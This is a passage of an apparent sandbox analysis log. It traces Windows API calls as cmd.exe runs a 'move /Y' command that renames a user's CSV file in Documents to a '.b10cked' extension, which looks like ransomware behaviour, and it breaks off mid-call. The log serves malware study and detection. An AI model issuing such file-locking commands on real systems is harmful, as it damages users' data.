0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35200 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 35201 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35202 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35203 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35204 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 35205 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 35206 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 35207 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 35208 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 35209 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Thread: id = 872 os_tid = 0xb2c [0234.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fdb4 | out: lpSystemTimeAsFileTime=0x26fdb4*(dwLowDateTime=0xbf40f900, dwHighDateTime=0x1d440a9)) [0234.527] GetCurrentProcessId () returned 0xb08 [0234.527] GetCurrentThreadId () returned 0xb2c [0234.527] GetTickCount () returned 0x406a4 [0234.527] QueryPerformanceCounter (in: lpPerformanceCount=0x26fdac | out: lpPerformanceCount=0x26fdac*=29131644474) returned 1 [0234.528] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0234.528] __set_app_type (_Type=0x1) [0234.528] __p__fmode () returned 0x76b331f4 [0234.528] __p__commode () returned 0x76b331fc [0234.528] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0234.528] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0234.528] GetCurrentThreadId () returned 0xb2c [0234.529] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb2c) returned 0x38 [0234.529] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.529] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0234.529] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.529] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0234.529] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fd44 | out: phkResult=0x26fd44*=0x0) returned 0x2 [0234.529] VirtualQuery (in: lpAddress=0x26fd7b, lpBuffer=0x26fd14, dwLength=0x1c | out: lpBuffer=0x26fd14*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.529] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fd14, dwLength=0x1c | out: lpBuffer=0x26fd14*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0234.529] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fd14, dwLength=0x1c | out: lpBuffer=0x26fd14*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0234.529] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fd14, dwLength=0x1c | out: lpBuffer=0x26fd14*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.529] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fd14, dwLength=0x1c | out: lpBuffer=0x26fd14*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0234.529] GetConsoleOutputCP () returned 0x1b5 [0234.529] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.529] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0234.529] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.529] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0234.530] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.530] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.530] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.530] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.530] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.530] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.530] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.530] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0234.530] GetEnvironmentStringsW () returned 0x3a0198* [0234.530] FreeEnvironmentStringsW (penv=0x3a0198) returned 1 [0234.530] GetEnvironmentStringsW () returned 0x3a0198* [0234.531] FreeEnvironmentStringsW (penv=0x3a0198) returned 1 [0234.531] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ecb4 | out: phkResult=0x26ecb4*=0x40) returned 0x0 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x0, lpData=0x26ecc0*=0xc0, lpcbData=0x26ecb8*=0x1000) returned 0x2 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x4, lpData=0x26ecc0*=0x1, lpcbData=0x26ecb8*=0x4) returned 0x0 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x0, lpData=0x26ecc0*=0x1, lpcbData=0x26ecb8*=0x1000) returned 0x2 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x4, lpData=0x26ecc0*=0x0, lpcbData=0x26ecb8*=0x4) returned 0x0 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x4, lpData=0x26ecc0*=0x40, lpcbData=0x26ecb8*=0x4) returned 0x0 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x4, lpData=0x26ecc0*=0x40, lpcbData=0x26ecb8*=0x4) returned 0x0 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x0, lpData=0x26ecc0*=0x40, lpcbData=0x26ecb8*=0x1000) returned 0x2 [0234.531] RegCloseKey (hKey=0x40) returned 0x0 [0234.531] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ecb4 | out: phkResult=0x26ecb4*=0x40) returned 0x0 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x0, lpData=0x26ecc0*=0x40, lpcbData=0x26ecb8*=0x1000) returned 0x2 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x4, lpData=0x26ecc0*=0x1, lpcbData=0x26ecb8*=0x4) returned 0x0 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x0, lpData=0x26ecc0*=0x1, lpcbData=0x26ecb8*=0x1000) returned 0x2 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x4, lpData=0x26ecc0*=0x0, lpcbData=0x26ecb8*=0x4) returned 0x0 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x4, lpData=0x26ecc0*=0x9, lpcbData=0x26ecb8*=0x4) returned 0x0 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x4, lpData=0x26ecc0*=0x9, lpcbData=0x26ecb8*=0x4) returned 0x0 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x0, lpData=0x26ecc0*=0x9, lpcbData=0x26ecb8*=0x1000) returned 0x2 [0234.531] RegCloseKey (hKey=0x40) returned 0x0 [0234.531] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0234.531] srand (_Seed=0x5b8863c2) [0234.531] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv.b10cked\"" [0234.531] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv.b10cked\"" [0234.532] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.532] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a18f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0234.532] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.532] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0234.532] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.532] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0234.532] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0234.532] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0234.532] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0234.532] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0234.532] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0234.532] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0234.532] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0234.532] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0234.532] GetEnvironmentStringsW () returned 0x3a22e8* [0234.532] FreeEnvironmentStringsW (penv=0x3a22e8) returned 1 [0234.532] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.532] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.532] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0234.532] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0234.533] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0234.533] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0234.533] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0234.533] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0234.533] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0234.533] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0234.533] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26fa80 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.533] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26fa80, lpFilePart=0x26fa7c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26fa7c*="Desktop") returned 0x18 [0234.533] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.533] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f7fc | out: lpFindFileData=0x26f7fc) returned 0x3a0028 [0234.533] FindClose (in: hFindFile=0x3a0028 | out: hFindFile=0x3a0028) returned 1 [0234.533] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f7fc | out: lpFindFileData=0x26f7fc) returned 0x3a0028 [0234.533] FindClose (in: hFindFile=0x3a0028 | out: hFindFile=0x3a0028) returned 1 [0234.533] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f7fc | out: lpFindFileData=0x26f7fc) returned 0x3a0028 [0234.533] FindClose (in: hFindFile=0x3a0028 | out: hFindFile=0x3a0028) returned 1 [0234.533] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.534] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0234.534] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0234.534] GetEnvironmentStringsW () returned 0x3a2b08* [0234.534] FreeEnvironmentStringsW (penv=0x3a2b08) returned 1 [0234.534] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.534] GetConsoleOutputCP () returned 0x1b5 [0234.534] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.534] GetUserDefaultLCID () returned 0x409 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fbc0, cchData=128 | out: lpLCData="0") returned 2 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fbc0, cchData=128 | out: lpLCData="0") returned 2 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fbc0, cchData=128 | out: lpLCData="1") returned 2 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0234.535] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0234.536] GetConsoleTitleW (in: lpConsoleTitle=0x3908f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.536] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.536] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0234.536] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0234.536] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0234.537] _wcsicmp (_String1="move", _String2=")") returned 68 [0234.537] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0234.537] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0234.537] _wcsicmp (_String1="IF", _String2="move") returned -4 [0234.537] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0234.537] _wcsicmp (_String1="REM", _String2="move") returned 5 [0234.537] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0234.540] GetConsoleTitleW (in: lpConsoleTitle=0x26f8b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.540] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0234.540] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0234.540] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0234.540] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0234.540] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0234.540] _wcsicmp (_String1="move", _String2="CD") returned 10 [0234.540] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0234.540] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0234.540] _wcsicmp (_String1="move", _String2="REN") returned -5 [0234.540] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0234.540] _wcsicmp (_String1="move", _String2="SET") returned -6 [0234.540] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0234.540] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0234.540] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0234.540] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0234.540] _wcsicmp (_String1="move", _String2="MD") returned 11 [0234.540] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0234.540] _wcsicmp (_String1="move", _String2="RD") returned -5 [0234.540] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0234.540] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0234.540] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0234.540] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0234.540] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0234.540] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0234.540] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0234.540] _wcsicmp (_String1="move", _String2="VER") returned -9 [0234.540] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0234.540] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0234.540] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0234.540] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0234.541] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0234.541] _wcsicmp (_String1="move", _String2="START") returned -6 [0234.541] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0234.541] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0234.541] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0234.542] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.542] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.542] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f674, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f66c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f66c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0234.542] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0234.542] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0234.542] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0234.542] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0234.542] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0234.542] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0234.542] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0234.542] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0234.542] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0234.542] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0234.543] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0234.543] _wcsicmp (_String1="oR2F.csv", _String2=".") returned 65 [0234.543] _wcsicmp (_String1="oR2F.csv", _String2="..") returned 65 [0234.543] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\or2f.csv")) returned 0x20 [0234.544] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3a1e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.544] SetErrorMode (uMode=0x0) returned 0x0 [0234.544] SetErrorMode (uMode=0x1) returned 0x0 [0234.544] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv", nBufferLength=0x104, lpBuffer=0x26effc, lpFilePart=0x26efe4 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv", lpFilePart=0x26efe4*="oR2F.csv") returned 0x30 [0234.544] SetErrorMode (uMode=0x0) returned 0x1 [0234.544] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd")) returned 0x12 [0234.544] _wcsicmp (_String1="oR2F.csv", _String2=".") returned 65 [0234.544] _wcsicmp (_String1="oR2F.csv", _String2="..") returned 65 [0234.544] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\or2f.csv")) returned 0x20 [0234.544] SetErrorMode (uMode=0x0) returned 0x0 [0234.544] SetErrorMode (uMode=0x1) returned 0x0 [0234.544] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv", nBufferLength=0x104, lpBuffer=0x26f478, lpFilePart=0x26f210 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv", lpFilePart=0x26f210*="oR2F.csv") returned 0x30 [0234.544] SetErrorMode (uMode=0x0) returned 0x1 [0234.544] SetErrorMode (uMode=0x0) returned 0x0 [0234.544] SetErrorMode (uMode=0x1) returned 0x0 [0234.544] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv.b10cked", nBufferLength=0x104, lpBuffer=0x26f680, lpFilePart=0x26f210 | out: 